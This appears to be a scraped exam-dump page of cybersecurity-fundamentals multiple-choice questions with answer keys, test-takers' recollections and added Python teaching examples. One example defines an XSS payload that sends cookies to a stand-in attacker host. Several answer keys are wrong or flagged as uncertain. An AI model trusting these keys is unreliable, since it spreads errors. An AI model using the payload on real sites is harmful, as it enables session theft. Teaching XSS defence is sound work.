
Which statement about the difference between a denial-of-service attack and a distributed
denial-of-service attack is true?

05/27/2018 – by Mod_GuideK 0

Which statement about the difference between a denial-of-service attack and a distributed
denial-of-service attack is true?
A. DoS attacks only use flooding to compromise a network, and DDoS attacks only use
other methods.
B. DoS attacks are launched from one host, and DDoS attacks are launched from multiple
hosts.
C. DoS attacks are launched from one host, and DDoS attacks are launched from multiple
hosts.
D. DDoS attacks are launched from one host, and DoS attacks are launched from multiple
hosts.
E. DoS attacks and DDoS attacks have no differences.

Correct Answer: B

For which purpose can Windows Management Instrumentation be used?

05/27/2018 – by Mod_GuideK 1

For which purpose can Windows Management Instrumentation be used?

A. Remote viewing of a computer
B. Remote blocking of malware on a computer
C. Remote reboot of a computer
D. Remote start of a computer

Correct Answer: A -------- C (from Microsoft website)

Which international standard is for general risk management, including the principles and
guidelines for managing risk?

05/27/2018 – by Mod_GuideK 2

Which international standard is for general risk management, including the principles and
guidelines for managing risk?
A. ISO 27001
B. ISO 27005
C. ISO 31000
D. ISO 27002

Correct Answer: C (ISO 31000)

Which process continues to be recorded in the process table after it has ended and the
status is returned to the parent?

05/27/2018 – by Mod_GuideK 3

Which process continues to be recorded in the process table after it has ended and the status is
returned to the parent?
A. daemon
B. zombie
C. orphan
D. child

Correct Answer: C (B by some people as zombie process suits ???)

Which kind of attack does an attacker use known information in encrypted files to break
the encryption scheme for the rest of

05/27/2018 – by Mod_GuideK 0

For which kind of attack does an attacker use known information in encrypted files to break the
encryption scheme for the rest of
A. known-plaintext
B. known-ciphertext
C. unknown key
D. man in the middle

Correct Answer: A

In which technology is network-level encryption not natively incorporated?

05/27/2018 – by Mod_GuideK 0

In which technology is network-level encryption not natively incorporated?

A. Kerberos
B. SSL
C. TLS
D. IPsec

Correct Answer: A

Which purpose of command and control for network-aware malware is true?

05/27/2018 – by Mod_GuideK 0

Which purpose of command and control for network-aware malware is true?
A. It helps the malware to profile the host
B. It takes over the user account
C. It contacts a remote server for commands and updates
D. It controls and shuts down services on the infected host

Correct Answer: C

Which action is an attacker taking when they attempt to gain root access on the victim's
system?

05/27/2018 – by Mod_GuideK 0

Which action is an attacker taking when they attempt to gain root access on the victim's system?
A. privilege escalation
B. command injection
C. rootkit
D. command and control

Correct Answer: A

Which vulnerability is an example of Shellshock?

05/27/2018 – by Mod_GuideK 0

Which vulnerability is an example of Shellshock?

A. SQL injection
B. heap overflow
C. cross-site scripting
D. command injection

Correct Answer: D

What type of algorithm uses the same key to encrypt and decrypt data?

05/27/2018 – by Mod_GuideK 0

What type of algorithm uses the same key to encrypt and decrypt data?
A. a symmetric algorithm
B. an asymmetric algorithm
C. a Public Key Infrastructure algorithm
D. an IP Security algorithm

Correct Answer: A

Which actions can a promiscuous IPS take to mitigate an attack?

05/27/2018 – by Mod_GuideK 0

Which actions can a promiscuous IPS take to mitigate an attack?

A. modifying packets
B. requesting connection blocking
C. denying packets
D. resetting the TCP connection
E. requesting host blocking
F. denying frames

Correct Answer: BDE

Which statement about personal firewalls is true?

05/27/2018 – by Mod_GuideK 0

Which statement about personal firewalls is true?

A. They are resilient against kernel attacks
B. They can protect email messages and private documents in a similar way to a VPN
C. They can protect the network against attacks
D. They can protect a system by denying probing requests

Correct Answer: D

Which three statements about host-based IPS are true?

05/27/2018 – by Mod_GuideK 0

Which three statements about host-based IPS are true? (Choose three)
A. It can view encrypted files
B. It can be deployed at the perimeter
C. It uses signature-based policies
D. It can have more restrictive policies than network-based IPS
E. It works with deployed firewalls
F. It can generate alerts based on behavior at the desktop level.
Correct Answer: ADF

What is a possible result of this activity?

05/27/2018 – by Mod_GuideK 0

An attacker installs a rogue switch that sends superior BPDUs on your network.
What is a possible result of this activity?
A. The switch could offer fake DHCP addresses.
B. The switch could become the root bridge.
C. The switch could be allowed to join the VTP domain
D. The switch could become a transparent bridge.

Correct Answer: B

Which reason is true?

05/27/2018 – by Mod_GuideK 0

You get an alert on your desktop computer showing that an attack was successful on the host, but
upon investigation you see that it occurred during the attack.
Which reason is true?
A. The computer has HIDS installed on it
B. The computer has NIDS installed on it
C. The computer has HIPS installed on it
D. The computer has NIPS installed on it

Correct Answer: A

Where are configuration records stored?

05/27/2018 – by Mod_GuideK 0

Where are configuration records stored?

A. In a CMDB
B. In a MySQL DB
C. In an XLS file
D. There is no need to store them

Correct Answer: A

Which of the following is true about heuristic-based algorithms?

05/27/2018 – by Mod_GuideK 0

Which of the following is true about heuristic-based algorithms?

A. Heuristic-based algorithms may require fine tuning to adapt to network traffic and
minimize the possibility of false positives.
B. Heuristic-based algorithms do not require fine tuning.
C. Heuristic-based algorithms support advanced malware protection.
D. Heuristic-based algorithms provide capabilities for the automation of IPS signature
creation and tuning.

Correct Answer: A

How many broadcast domains are created if three hosts are connected to a Layer 2 switch
in full-duplex mode?

05/27/2018 – by Mod_GuideK 0

How many broadcast domains are created if three hosts are connected to a Layer 2 switch in
full-duplex mode?
A. 4
B. 3
C. None
D. 1

Correct Answer: D

What is one of the advantages of the mandatory access control (MAC) model?

05/27/2018 – by Mod_GuideK 0

What is one of the advantages of the mandatory access control (MAC) model?
A. Stricter control over the information access.
B. Easy and scalable.
C. The owner can decide whom to grant access to.
D. Complex to administer.

Correct Answer: A

What is the subject location considered?

05/27/2018 – by Mod_GuideK 0

According to the attribute-based access control (ABAC) model, what is the subject location
considered?
A. Part of the environmental attributes
B. Part of the object attributes
C. Part of the access control attributes
D. None of the above

Correct Answer: A

In which case should an employee return his laptop to the organization?

05/27/2018 – by Mod_GuideK 0

In which case should an employee return his laptop to the organization?

A. When moving to a different role
B. Upon termination of the employment
C. As described in the asset return policy
D. When the laptop is end of lease

Correct Answer: C

Which of the following are metrics that can measure the effectiveness of a runbook?

05/27/2018 – by Mod_GuideK 0

Which of the following are metrics that can measure the effectiveness of a runbook?
A. Mean time to repair (MTTR)
B. Mean time between failures (MTBF)
C. Mean time to discover a security incident
D. All of the above

Correct Answer: D

Which of the following elements within a packet?

05/27/2018 – by Mod_GuideK 0

Stateful and traditional firewalls can analyze packets and judge them against a set of
predetermined rules called access control lists (ACLs).
They inspect which of the following elements within a packet? (Choose Two)
A. Session headers
B. NetFlow flow information
C. Source and destination ports and source and destination IP addresses
D. Protocol information

Correct Answer: CD

Which of the following are Cisco cloud security solutions?

05/27/2018 – by Mod_GuideK 0

Which of the following are Cisco cloud security solutions?

A. CloudDLP
B. OpenDNS
C. CloudLock
D. CloudSLS

Correct Answer: BC

What is a trunk link used for?

05/27/2018 – by Mod_GuideK 0

What is a trunk link used for?

A. To pass multiple virtual LANs
B. To connect more than two switches
C. To enable Spanning Tree Protocol
D. To encapsulate Layer 2 frames

Correct Answer: A

At which OSI layer does a router typically operate?

05/27/2018 – by Mod_GuideK 0

At which OSI layer does a router typically operate?

A. Transport
B. Network
C. Data link
D. Application

Correct Answer: B

Which devices?

05/27/2018 – by Mod_GuideK 0

Cisco pxGrid has a unified framework with an open API designed in a hub-and-spoke
architecture. pxGrid is used to enable the sharing of contextual-based information from which
devices?
A. From a Cisco ASA to the Cisco OpenDNS service
B. From a Cisco ASA to the Cisco WSA
C. From a Cisco ASA to the Cisco FMC
D. From a Cisco ISE session directory to other policy network systems, such as Cisco IOS
devices and the Cisco ASA

Correct Answer: D

What are the advantages of a full-duplex transmission mode compared to half-duplex mode?

05/27/2018 – by Mod_GuideK 0

What are the advantages of a full-duplex transmission mode compared to half-duplex mode?
(Select all that apply.)
A. Each station can transmit and receive at the same time.
B. It avoids collisions.
C. It makes use of backoff time.
D. It uses a collision avoidance algorithm to transmit.
Correct Answer: AB

What is PHI?

05/27/2018 – by Mod_GuideK 0

What is PHI?
A. Protected HIPAA information
B. Protected health information
C. Personal health information
D. Personal human information

Correct Answer: B

Drag and Drop

08/09/2017 – by Mod_GuideK 23

Drag and Drop

Drag the data source on the left to the correct data type on the right.
Select and Place:

Correct Answer:
What does the X.509v3 indicate? (I remember the choices; choose 3)
a.) public key of the certificate
b.) private key of the certificate
c.) subject of the certificate
d.) (can't remember the two)

What is a Heartbleed attack?
a.) command injection
b.) buffer overflow
c.) I don't know
d.) I can't remember

How can you correlate NTP in an accurate time, something
a.) asynchronous
b.) get time from each network device
c.) get from AD/domain controller
d.) synchronous time

What access control is from the root administrator? As far as I remember the choices are
a.) mandatory
b.) discretionary
c.) least privilege
d.) RBAC

The FMC can share HTML, PDF and CSV data types that relate to a specific event type.
Which specific event type data?
A. Connection
B. Host
C. Netflow
D. Intrusion
Answer: D

Which of the following are metrics that can measure the effectiveness of a runbook?
A. Mean time to repair (MTTR)
B. Mean time between failures (MTBF)
C. Mean time to discover a security incident
D. All of the above
Answer: D

In which case should an employee return his laptop to the organization?


A. When moving to a different role
B. Upon termination of the employment
C. As described in the asset return policy
D. When the laptop is end of lease
Answer: C

What are the advantages of a full-duplex transmission mode compared to half-duplex mode?
(Select all that apply.)
A. Each station can transmit and receive at the same time.
B. It avoids collisions.
C. It makes use of backoff time.
D. It uses a collision avoidance algorithm to transmit.
Answer: AB

Stateful and traditional firewalls can analyze packets and judge them against a set of
predetermined rules called access control lists (ACLs).
They inspect which of the following elements within a packet? (Choose Two)
A. Session headers
B. NetFlow flow information
C. Source and destination ports and source and destination IP addresses
D. Protocol information
Answer: CD
Cisco pxGrid has a unified framework with an open API designed in a hub-and-spoke
architecture. pxGrid is used to enable the sharing of contextual-based information from which
devices?
A. From a Cisco ASA to the Cisco OpenDNS service
B. From a Cisco ASA to the Cisco WSA
C. From a Cisco ASA to the Cisco FMC
D. From a Cisco ISE session directory to other policy network systems, such as Cisco IOS
devices and the Cisco ASA

For which purpose can Windows management instrumentation be used?


A. Remote viewing of a computer
B. Remote blocking of malware on a computer
C. Remote reboot of a computer
D. Remote start of a computer
Answer: A

Which international standard is for general risk management, including the principles and
guideline for managing risk?
A. ISO 31000
B. ISO 27001
C. ISO 27005
D. ISO 27002
Answer: A

Which statement about the difference between a denial-of-service attack and a distributed
denial-of-service attack is true?
A. DoS attacks are launched from one host, and DDoS attacks are launched from multiple hosts.
B. DoS attacks and DDoS attacks have no differences.
C. DDoS attacks are launched from one host, and DoS attacks are launched from multiple hosts.
D. DoS attacks only use flooding to compromise a network, and DDoS attacks only use other
methods.
Answer: A

You discover that a foreign government hacked one of the defense contractors in your country
and stole intellectual property. In this situation, which option is considered the threat agent?
A. method in which the hack occurred
B. defense contractor that stored the intellectual property
C. intellectual property that was stolen
D. foreign government that conducted the attack
Answer: A

After a large influx of network traffic to externally facing devices, you begin investigating what
appears to be a denial of service attack. When you review packet capture data, you notice that the
traffic is a single SYN packet to each port. Which kind of attack is this?
A. SYN flood.
B. Host profiling.
C. Traffic fragmentation.
D. Port scanning.
Answer: D

Which definition of Common Event Format in terms of a security information and event
management solution is true?
A. A type of event log used to identify a successful user login.
B. A TCP network media protocol.
C. Event log analysis certificate that stands for certified event forensics.
D. A standard log event format that is used for log collection.
Answer: D

Which definition of a Linux daemon is true?

A. Process that is causing harm to the system by either using up system resources or causing a
critical crash.
B. Long-running process that is the child of the init process.
C. Process that has no parent process.
D. Process that is starved of the CPU.
Answer: B

Which term describes reasonable effort that must be made to obtain relevant information to
facilitate appropriate courses of action?
A. Due diligence.
B. Ethical behavior.
C. Decision making.
D. Data mining.
Answer: A

According to the Common Vulnerability Scoring System, which term is associated with scoring
multiple vulnerabilities that are exploited in the course of a single attack?
A. chained score
B. risk analysis
C. vulnerability chaining
D. confidentiality
Answer: C

In which format are NetFlow records stored?

A. hexadecimal
B. base 10
C. binary
D. ASCII
Answer: C

Which purpose of Command and Control for network aware malware is true?
A. It contacts a remote server for commands and updates.
B. It controls and shuts down services on the infected host.
C. It helps the malware to profile the host
D. It takes over the user account.
Answer: A

Which of the following access control models use security labels to make access decisions?
A. Discretionary access control (DAC)
B. Mandatory access control (MAC)
C. Role-based access control (RBAC)
D. Identity-based access control (IBAC)
Answer: B

Q) What type of attack is Shellshock? I think the answer is command injection since the word
shell is in the name.

– Which format does NetFlow use?
Base10
ASCII
Binary
Hexadecimal

– A question about SYN flood. Gives the scenario that using a Full Packet Capture tool, you
notice multiple SYN messages, this is an example of what?
Possible answer: SYN flood

– There was a question about ciphers. The scenario was that the attacker knows some information in the
ciphertext of several messages and also knows something about the plaintext that underlies the
ciphertext. (This scenario describes both a Known-plaintext Attack and a Meet-in-the-middle
Attack). The question asks which type of attack it is.
A possible answer was man-in-the-middle, which is obviously wrong. Leaving Known-plaintext
Attack as the best option.

– Question asks about daemon process.
Processes that detach themselves from the script that starts them and continue to run in the
background. The answer ended with something like, ‘it is spawned from a parent init process.’

– Question asks about zombie process.
The answer was something like, completed processes that are not yet removed from the kernel’s
process table.

– Question about SIEM provide HTML, PDF and CSV format and asked what is it?
(I don’t know what this question means)

– Question said that a foreign government attacked your defense weapons contractor and stole
intellectual property; that foreign government is defined as what?
1) Defense Weapons Contractor who stole intellectual property
2) Foreign government who conducted the attack
3) Intellectual property that got stolen
4) Method used by the foreign government to hack
(Not sure of the correct answer, maybe 2? Don't understand it very well)

– Question making a statement like Microsoft PPTP uses RC4, which is a stream cipher; what attack is it
vulnerable to when the same key is used twice?
Ciphertext-only Attack, when an attacker uses ciphertext from several messages and tries to
deduce the plaintext or key from just that information, using statistical analysis

– A question about CVSS was how is scoring handled when multiple vulnerabilities are found in
the same attack.
Vulnerability Chaining (While not a formal metric, guidance on scoring multiple vulnerabilities
is provided with Vulnerability Chaining. https://www.first.org/cvss/cvss-v30-
user_guide_v1.1.pdf)

– Several questions and/or answers had RFC numbers.
For the ones about DNS you really only need to know that DNS queries use UDP port 53 and zone
transfers use TCP port 53, in the quoted RFCs.
Answers given include UDP 53 and TCP 53

– There was a question about the ISO implementing guidance for general risk management.
Answer given:
ISO 27001 to 27005. This person selected 270002, which he thought was correct after memorizing
the titles for ISO 27001 – 27005

– There was a question about what the command is to see every process on the Linux system.
Maybe this answer is ps -ef

– one that asked something like, what event types does FMC record? FMC = Firepower
Management Center

– something similar to, what cryptography is used on Digital Certificates? The answers included:
SHA-256
SHA-512
RSA 4096
I think answers are SHA-256 and SHA-384 if it appears on the answers list.

– SIEM Common Event Format, what is it?
He didn’t remember the exact question but, given that the syslog message format is used as a
transport mechanism for a Common Event Format, he’d look for something related to that in an
answer.

– A question about what device terminates broadcast domains.
Router is the answer

– A question making a statement like, RC4 is a stream cipher; what attack is it vulnerable to when
the same key is used twice?
Ciphertext-only Attack, when an attacker uses ciphertext from several messages and tries to
deduce the plaintext or key from just that information, using statistical analysis

NetFlow data type: binary, hexadecimal, base 10 or decimal.

Standards help organizations keep information assets secure: ISO 27001
Read about hashing attacks like known plaintext, known ciphertext, ciphertext only and meet
in the middle.
Read about the ps -ef Linux command.
Read about Linux zombie process, parent process, child process, orphan process…
Read about CVSS.

Which two features must a next generation firewall include?

08/09/2017 – by Mod_GuideK 4

Which two features must a next generation firewall include? (Choose two.)
A. data mining
B. host-based antivirus
C. application visibility and control
D. Security Information and Event Management
E. intrusion detection system

Correct Answer: CE

Which term represents a weakness in a system that could lead to the system being
compromised?

08/09/2017 – by Mod_GuideK 0

Which term represents a weakness in a system that could lead to the system being compromised?
A. vulnerability
B. threat
C. exploit
D. risk

Correct Answer: A

Which definition of Windows Registry is true?

08/09/2017 – by Mod_GuideK 2

Which definition of Windows Registry is true?

A. set of pages that are currently resident in physical memory
B. basic unit to which the operating system allocates processor time
C. set of virtual memory addresses
D. database that stores low-level settings for the operating system

Correct Answer: D

Which definition of the IIS Log Parser tool is true?

08/09/2017 – by Mod_GuideK 1

Which definition of the IIS Log Parser tool is true?

A. a logging module for IIS that allows you to log to a database
B. a data source control to connect to your data source
C. a powerful, versatile tool that makes it possible to run SQL-like queries against log files
D. a powerful, versatile tool that verifies the integrity of the log files

Correct Answer: C

Drag and Drop

08/09/2017 – by Mod_GuideK 5

Drag and Drop

Drag the technology on the left to the data type the technology provides on the right.
Select and Place:

Correct Answer:

Which three options are types of Layer 2 network attack?

08/09/2017 – by Mod_GuideK 0

Which three options are types of Layer 2 network attack? (Choose three.)
A. ARP attacks
B. brute force attacks
C. spoofing attacks
D. DDOS attacks
E. VLAN hopping
F. botnet attacks

Correct Answer: ACE

How many broadcast domains are present on the router?

08/09/2017 – by Mod_GuideK 0

If a router has four interfaces and each interface is connected to four switches, how many
broadcast domains are present on the router?
A. 1
B. 2
C. 4
D. 8

Correct Answer: C

Where does routing occur within the DoD TCP/IP reference model?

08/09/2017 – by Mod_GuideK 0

Where does routing occur within the DoD TCP/IP reference model?
A. application
B. internet
C. network
D. transport

Correct Answer: B

Which NTP command configures the local device as an NTP reference clock source?

08/09/2017 – by Mod_GuideK 0

Which NTP command configures the local device as an NTP reference clock source?
A. ntp peer
B. ntp broadcast
C. ntp master
D. ntp server

Correct Answer: C

Which technology allows a large number of private IP addresses to be represented by a
smaller number of public IP addresses?

08/09/2017 – by Mod_GuideK 0

Which technology allows a large number of private IP addresses to be represented by a smaller
number of public IP addresses?
A. NAT
B. NTP
C. RFC 1631
D. RFC 1918

Correct Answer: A

Which statement about digitally signing a document is true?

08/09/2017 – by Mod_GuideK 1

Which statement about digitally signing a document is true?

A. The document is hashed and then the document is encrypted with the private key.
B. The document is hashed and then the hash is encrypted with the private key.
C. The document is encrypted and then the document is hashed with the public key
D. The document is hashed and then the document is encrypted with the public key.

Correct Answer: B

Which reason can HTTPS traffic make security monitoring difficult?

08/09/2017 – by Mod_GuideK 0

For which reason can HTTPS traffic make security monitoring difficult?
A. encryption
B. large packet headers
C. Signature detection takes longer.
D. SSL interception

Correct Answer: A

Which directory is commonly used on Linux systems to store log files, including syslog and
Apache access logs?

08/09/2017 – by Mod_GuideK 0

Which directory is commonly used on Linux systems to store log files, including syslog and
Apache access logs?
A. /etc/log
B. /root/log
C. /lib/log
D. /var/log

Correct Answer: D

Which encryption algorithm is the strongest?

08/09/2017 – by Mod_GuideK 1

Which encryption algorithm is the strongest?

A. AES
B. CES
C. DES
D. 3DES

Correct Answer: A

Which protocol maps IP network addresses to MAC hardware addresses so that IP packets
can be sent across networks?

08/09/2017 – by Mod_GuideK 0

Which protocol maps IP network addresses to MAC hardware addresses so that IP packets can
be sent across networks?
A. Internet Control Message Protocol
B. Address Resolution Protocol
C. Session Initiation Protocol
D. Transmission Control Protocol/Internet Protocol

Correct Answer: B

Which definition of the virtual address space for a Windows process is true?

08/09/2017 – by Mod_GuideK 1

Which definition of the virtual address space for a Windows process is true?
A. actual physical location of an object in memory
B. set of virtual memory addresses that it can use
C. set of pages that are currently resident in physical memory
D. system-level memory protection feature that is built into the operating system

Correct Answer: B

Which information security property is supported by encryption?

08/09/2017 – by Mod_GuideK 0

Which information security property is supported by encryption?

A. sustainability
B. integrity
C. confidentiality
D. availability

Correct Answer: C

Which situation indicates application-level white listing?

08/09/2017 – by Mod_GuideK 11

Which situation indicates application-level white listing?

A. Allow everything and deny specific executable files.
B. Allow specific executable files and deny specific executable files.
C. Writing current application attacks on a whiteboard daily.
D. Allow specific files and deny everything else.

Correct Answer: D

Which attack method is it vulnerable?

08/09/2017 – by Mod_GuideK 1

If a web server accepts input from the user and passes it to a bash shell, to which attack method
is it vulnerable?
A. input validation
B. hash collision
C. command injection
D. integer overflow

Correct Answer: C

Which definition describes the main purpose of a Security Information and Event
Management solution?

08/09/2017 – by Mod_GuideK 0

Which definition describes the main purpose of a Security Information and Event Management
solution?
A. a database that collects and categorizes indicators of compromise to evaluate and search
for potential security threats
B. a monitoring interface that manages firewall access control lists for duplicate firewall
filtering
C. a relay server or device that collects then forwards event logs to another log collection
device
D. a security product that collects, normalizes, and correlates event log data to provide
holistic views of the security posture

Correct Answer: D

Which option is a purpose of port scanning?

08/09/2017 – by Mod_GuideK 0

Which option is a purpose of port scanning?

A. Identify the Internet Protocol of the target system.
B. Determine if the network is up or down
C. Identify which ports and services are open on the target host.
D. Identify legitimate users of a system.

Correct Answer: C

Which transport protocol is recommended for use with DNS queries?

08/09/2017 – by Mod_GuideK 4

According to RFC 1035, which transport protocol is recommended for use with DNS queries?
A. Transmission Control Protocol
B. Reliable Data Protocol
C. Hypertext Transfer Protocol
D. User Datagram Protocol

Correct Answer: D

What does CIA mean in this context?

08/09/2017 – by Mod_GuideK 0

One of the objectives of information security is to protect the CIA of information and systems.
What does CIA mean in this context?
A. Confidentiality, Integrity, and Availability
B. Confidentiality, Identity, and Availability
C. Confidentiality, Integrity, and Authorization
D. Confidentiality, Identity, and Authorization

Correct Answer: A

Which term represents the practice of giving employees only those permissions necessary to
perform their specific role within an organization?

08/09/2017 – by Mod_GuideK 1

Which term represents the practice of giving employees only those permissions necessary to
perform their specific role within an organization?
A. integrity validation
B. due diligence
C. need to know
D. least privilege

Correct Answer: D

Which term represents the chronological record of how evidence was collected, analyzed,
preserved, and transferred?

08/09/2017 – by Mod_GuideK 0

Which term represents the chronological record of how evidence was collected, analyzed,
preserved, and transferred?
A. chain of evidence
B. evidence chronology
C. chain of custody
D. record of safekeeping

Correct Answer: C

Which two tasks can be performed by analyzing the logs of a traditional stateful firewall?

08/09/2017 – by Mod_GuideK 9

Which two tasks can be performed by analyzing the logs of a traditional stateful firewall?
(Choose two.)
A. Confirm the timing of network connections differentiated by the TCP 5-tuple
B. Audit the applications used within a social networking web site.
C. Determine the user IDs involved in an instant messaging exchange.
D. Map internal private IP addresses to dynamically translated external public IP
addresses
E. Identify the malware variant carried by an SMTP connection

Correct Answer: AD (BE ???)

Which security monitoring data type is associated with application server logs?

08/09/2017 – by Mod_GuideK 0

Which security monitoring data type is associated with application server logs?
A. alert data
B. statistical data
C. session data
D. transaction data

Correct Answer: D

Where is a host-based intrusion detection system located?

08/09/2017 – by Mod_GuideK 0

Where is a host-based intrusion detection system located?

A. on a particular end-point as an agent or a desktop application
B. on a dedicated proxy server monitoring egress traffic
C. on a span switch port
D. on a tap switch port

Correct Answer: A

Which hash algorithm is the weakest?

08/09/2017 – by Mod_GuideK 0

Which hash algorithm is the weakest?

A. SHA-512
B. RSA 4096
C. SHA-1
D. SHA-256

Correct Answer: C

Which problem is a possible explanation of this situation?

08/09/2017 – by Mod_GuideK 3

A user reports difficulties accessing certain external web pages. When examining traffic to and
from the external domain in full packet captures, you notice many SYNs that have the same
sequence number, source, and destination IP address, but have different payloads. Which
problem is a possible explanation of this situation?
A. insufficient network resources
B. failure of full packet capture solution
C. misconfiguration of web filter
D. TCP injection

HIDE ANSWERS
Correct Answer: D
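
The pattern in this question is what TCP injection looks like on the wire: a legitimate retransmission repeats the same bytes, but an injected segment racing the real one must reuse the sequence number and endpoints while carrying attacker-chosen data. The detector below is an added example (Python, not part of the original page or the exam) run over a constructed list of packet records; the field names and the `Packet` class are assumptions standing in for whatever your pcap parser exposes.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    """Fields an analyst would pull from a full packet capture (constructed; not a pcap parser)."""
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    flags: str      # e.g. "S", "SA", "PA"
    ttl: int
    payload: bytes


# Constructed capture: a client talking to an external web server.  On port 40501 three
# SYNs share one sequence number and endpoints but carry different payloads and arrive
# with different TTLs, which is the situation the question describes.
CAPTURE = [
    Packet("10.0.0.8", 40500, "203.0.113.20", 80, 1000, "S", 64, b""),
    Packet("10.0.0.8", 40500, "203.0.113.20", 80, 1000, "S", 64, b""),   # genuine retransmit: identical bytes
    Packet("10.0.0.8", 40501, "203.0.113.20", 80, 2000, "S", 64, b""),
    Packet("10.0.0.8", 40501, "203.0.113.20", 80, 2000, "S", 51, b"GET / HTTP/1.1\r\nHost: x\r\n\r\n"),
    Packet("10.0.0.8", 40501, "203.0.113.20", 80, 2000, "S", 49, b"<script>evil()</script>"),
    Packet("203.0.113.20", 80, "10.0.0.8", 40501, 5000, "SA", 52, b""),
]


def find_conflicting_segments(packets, only_syn=True):
    """Group segments by (src, sport, dst, dport, seq) and report groups whose members
    disagree on payload.  Same sequence number + different payload cannot come from a
    well-behaved sender; it is the signature of a racing/injected segment."""
    groups = defaultdict(list)
    for p in packets:
        if only_syn and "S" not in p.flags:
            continue
        groups[(p.src, p.sport, p.dst, p.dport, p.seq)].append(p)

    findings = []
    for key, segs in groups.items():
        payloads = {s.payload for s in segs}
        if len(payloads) > 1:
            findings.append({
                "flow": key,
                "count": len(segs),
                "distinct_payloads": len(payloads),
                # A spread of TTL values from one "sender" is a second hint that the
                # segments did not all originate at the same host.
                "ttls": sorted({s.ttl for s in segs}),
            })
    return findings


if __name__ == "__main__":
    for finding in find_conflicting_segments(CAPTURE):
        print(finding)
```

Port 40500 is not reported because its two SYNs are byte-identical; only the port 40501 group, with three distinct payloads and three TTLs, is flagged.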

Which tool is commonly used by threat actors on a webpage to take advantage of the
software vulnerabilities of a system to spread malware?

08/09/2017 – by Mod_GuideK 0

Which tool is commonly used by threat actors on a webpage to take advantage of the
software vulnerabilities of a system to spread malware?
A. exploit kit
B. root kit
C. vulnerability kit
D. script kiddie kit

HIDE ANSWERS
Correct Answer: A

Which files contain the same content?

08/09/2017 – by Mod_GuideK 0
Refer to the exhibit. During an analysis this list of email attachments is found. Which files
contain the same content?

A. 1 and 4
B. 3 and 4
C. 1 and 3
D. 1 and 2

HIDE ANSWERS
Correct Answer: C
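
The exhibit for this question is not reproduced on the page, but the method it tests is the same one used in practice: two attachments contain the same content exactly when their cryptographic hashes match, whatever their names or extensions say. The block below is an added example (Python, not the page's or the exam's code) over a constructed set of attachments; it also relates to the "weakest hash" question above by showing the digest sizes of SHA-1, SHA-256 and SHA-512 side by side (RSA is left out because it is a public-key cipher, not a hash).

```python
import hashlib

# Constructed attachments: names and extensions differ, but files 1 and 3 hold identical bytes.
ATTACHMENTS = {
    "1_invoice.pdf": b"%PDF-1.4 constructed invoice body ...",
    "2_invoice.pdf": b"%PDF-1.4 constructed invoice body ... (edited)",
    "3_report.docx": b"%PDF-1.4 constructed invoice body ...",   # same bytes as file 1
    "4_notes.txt":   b"plain text notes",
}


def digest(data, algorithm="sha256"):
    """Hex digest of a byte string; algorithm names are the ones hashlib accepts."""
    return hashlib.new(algorithm, data).hexdigest()


def group_by_content(files, algorithm="sha256"):
    """Return {digest: [names...]}: identical content collapses into one group regardless
    of file name or extension, which is how an analyst finds renamed copies."""
    groups = {}
    for name, data in files.items():
        groups.setdefault(digest(data, algorithm), []).append(name)
    return groups


def duplicate_sets(files, algorithm="sha256"):
    """Only the groups with more than one member, each sorted by name."""
    return sorted(sorted(names) for names in group_by_content(files, algorithm).values()
                  if len(names) > 1)


def compare_algorithms(data):
    """Output size in bits of the hashes named in the 'weakest hash' question.  SHA-1's
    160-bit output is not by itself what makes it weak; demonstrated collisions are,
    so use SHA-256 or better when the hash is relied on to prove two files are the same."""
    return {alg: len(digest(data, alg)) * 4 for alg in ("sha1", "sha256", "sha512")}


if __name__ == "__main__":
    print(duplicate_sets(ATTACHMENTS))
    print(compare_algorithms(b"abc"))
```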

Which network device is used to separate broadcast domains?

08/09/2017 – by Mod_GuideK 0

Which network device is used to separate broadcast domains?

A. router
B. repeater
C. switch
D. bridge

HIDE ANSWERS
Correct Answer: A

Which statement does the discretionary access control security model grant or restrict
access?

08/09/2017 – by Mod_GuideK 5

Based on which statement does the discretionary access control security model grant or restrict
access?
A. discretion of the system administrator
B. security policy defined by the owner of an object
C. security policy defined by the system administrator
D. role of a user within an organization

HIDE ANSWERS
Correct Answer: B

Which cryptographic key is contained in an X.509 certificate?

08/09/2017 – by Mod_GuideK 1

Which cryptographic key is contained in an X.509 certificate?

A. symmetric
B. public
C. private
D. asymmetric

HIDE ANSWERS
Correct Answer: B

Which two activities are examples of social engineering?

08/09/2017 – by Mod_GuideK 9

Which two activities are examples of social engineering? (Choose two.)

A. receiving a call from the IT department asking you to verify your username/password to
maintain the account
B. receiving an invite to your department’s weekly WebEx meeting
C. sending a verbal request to an administrator to change the password to the account of a
user the administrator does know
D. receiving an email from HR requesting that you visit the secure HR website and update
your contract information
E. receiving an unexpected email from an unknown person with an uncharacteristic
attachment from someone in the same company

HIDE ANSWERS
Correct Answer: AD

Which definition of a fork in Linux is true?

08/09/2017 – by Mod_GuideK 1

Which definition of a fork in Linux is true?

A. daemon to execute scheduled commands
B. parent directory name of a file pathname
C. macros for manipulating CPU sets
D. new process created by a parent process

HIDE ANSWERS
Correct Answer: D (C???)

Which two actions are valid uses of public key infrastructure?

08/09/2017 – by Mod_GuideK 8

Which two actions are valid uses of public key infrastructure? (Choose two.)
A. ensuring the privacy of a certificate
B. revoking the validation of a certificate
C. validating the authenticity of a certificate
D. creating duplicate copies of a certificate
E. changing ownership of a certificate

HIDE ANSWERS
Correct Answer: AC (BC ??)

Which two terms are types of cross site scripting attacks?

08/09/2017 – by Mod_GuideK 0

Which two terms are types of cross site scripting attacks? (Choose two.)
A. directed
B. encoded
C. stored
D. reflected
E. cascaded

HIDE ANSWERS
Correct Answer: CD
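
Stored XSS persists the payload (a comment, a profile field) and serves it to every later visitor; reflected XSS echoes it from the request (a search term, an error message) straight back to the victim who sent it. Both have the same root cause and the same fix: encode user-controlled data for the HTML context at the point where it is inserted. The block below is an added example (Python, not from the page or the exam) that puts the vulnerable rendering next to the hardened one using the standard library's `html.escape`; the comment store, the page templates and the payload are constructed.

```python
import html

# Constructed "database" of stored comments.
COMMENTS_DB = []

# Constructed attacker payload: exfiltrates the session cookie to a hypothetical host.
PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


def store_comment(text):
    """Persisting the raw input is fine; the bug is in how it is rendered later."""
    COMMENTS_DB.append(text)


def render_comments_vulnerable():
    """Stored XSS sink: raw user input is concatenated into HTML for every viewer."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS_DB) + "</ul>"


def render_comments_fixed():
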